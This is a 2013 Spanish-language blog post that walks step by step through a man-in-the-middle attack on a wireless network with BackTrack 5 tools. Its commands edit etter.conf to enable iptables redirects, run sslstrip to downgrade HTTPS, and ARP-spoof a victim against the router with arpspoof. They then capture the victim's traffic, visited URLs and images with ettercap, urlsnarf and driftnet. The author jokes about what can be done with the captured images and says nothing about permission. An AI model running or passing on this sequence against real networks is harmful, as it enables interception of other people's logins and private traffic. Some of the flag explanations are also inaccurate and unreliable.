lunes, 11 de marzo de 2013

Man in the Middle con Ett3rcap+Sslstrip+Driftnet









En esta ocasión voy a mostrarles como hacer un ataque MITM con las herrmanientas automatizadas incluidas en BackTrack 5. Lo primero que vamos a hacer es  abrir una consola e iniciar nmap, zenmap o angry ip scanner ya depende el gusto de cada quien para localizar nuestros potenciales targets, luego  configurar nuestro Ettercap sino lo tienes ya para que los paquetes de la victima lleguen al destino correcto...XD XD

Abrimos una consola y pegamos el siguiente destino nano /etc/etter.conf , luego localizamos las lineas 


#---------------
#     Linux 
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Así luce cuando esta en su configuración original.... debe de quedar así:


#---------------
#     Linux 
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"



Lo que hicimos fue des-comentar las lineas:


redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


mediante la eliminación de los hashes (#) , ahora guardas y cierras.



Ahora llego el turno de iniciar Sslstrip


Abrimos una terminal y 
escribimos lo siguiente


cd /pentest/web/sslstrip

Luego para iniciarlo python sslstrip.py -a -k -f

Por lo que:

-a Registra todo el tráfico SSL y HTTP desde el server.
-k Mata sesiones en curso.
-f Sustituye el favicon en conecciones seguras.




Continuamos redirigiendo el trafico con este comando:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 



Luego iniciamos el plugin arpspoof que esta incluido en Dsniff con el siguiente comando:

arpspoof -i wlan0 -t (ip victima) (ip del router)


Y ya estamos cerca del objetivo....

Ahora iniciamos el Sniffeo en modo consola con Ettercap con el siguiente comando:

ettercap -Tq -L etterlogs -i wlan0 

Por lo que 
-Tq es para que se muestre en solo texto u no se muestre el contenido de los paquetes.
-L es para que escriba todos los logs en el archivo etterlogs .
-i es la interface de red.

Ahora usaremos UrlSnarf que como su nombre nos lo indica solo se dedicara a olfatear todos las URL solicitadas Sniffeadas del trafico Http en CLF (Common Log Format) utilizada en casi todos los servidores web. 

Bueno lo iniciamos con el siguiente comando:

urlsnarf -vvv -i wlan0

Donde :
-v es modo versus invierte el sentido de la concordancia para seleccionar las URL no coorrespondientes.
-i es la interface de red.


Y por ultimo mi buen amigo Driftnet que sirve para capturar imágenes del trafico de red...ya imaginaran lo que se puede hacer  XD XD.

Se inicia con el siguiente comando:  

driftnet -v -i wlan0

Cabe mencionar que todas estas pruebas se estan haciendo con la interfaz Wlan0 si no es tu caso el de estar conectado por red inalambrica hay que cambiar  por eth0 o cualquiera que sea, puedes saber que interfaz estas utilizando mediante el siguiente comando ya conocido por la mayoria de nosotros:

ifconfig


Gracias por leer y Enjoy the tool!!!!






No hay comentarios:

Publicar un comentario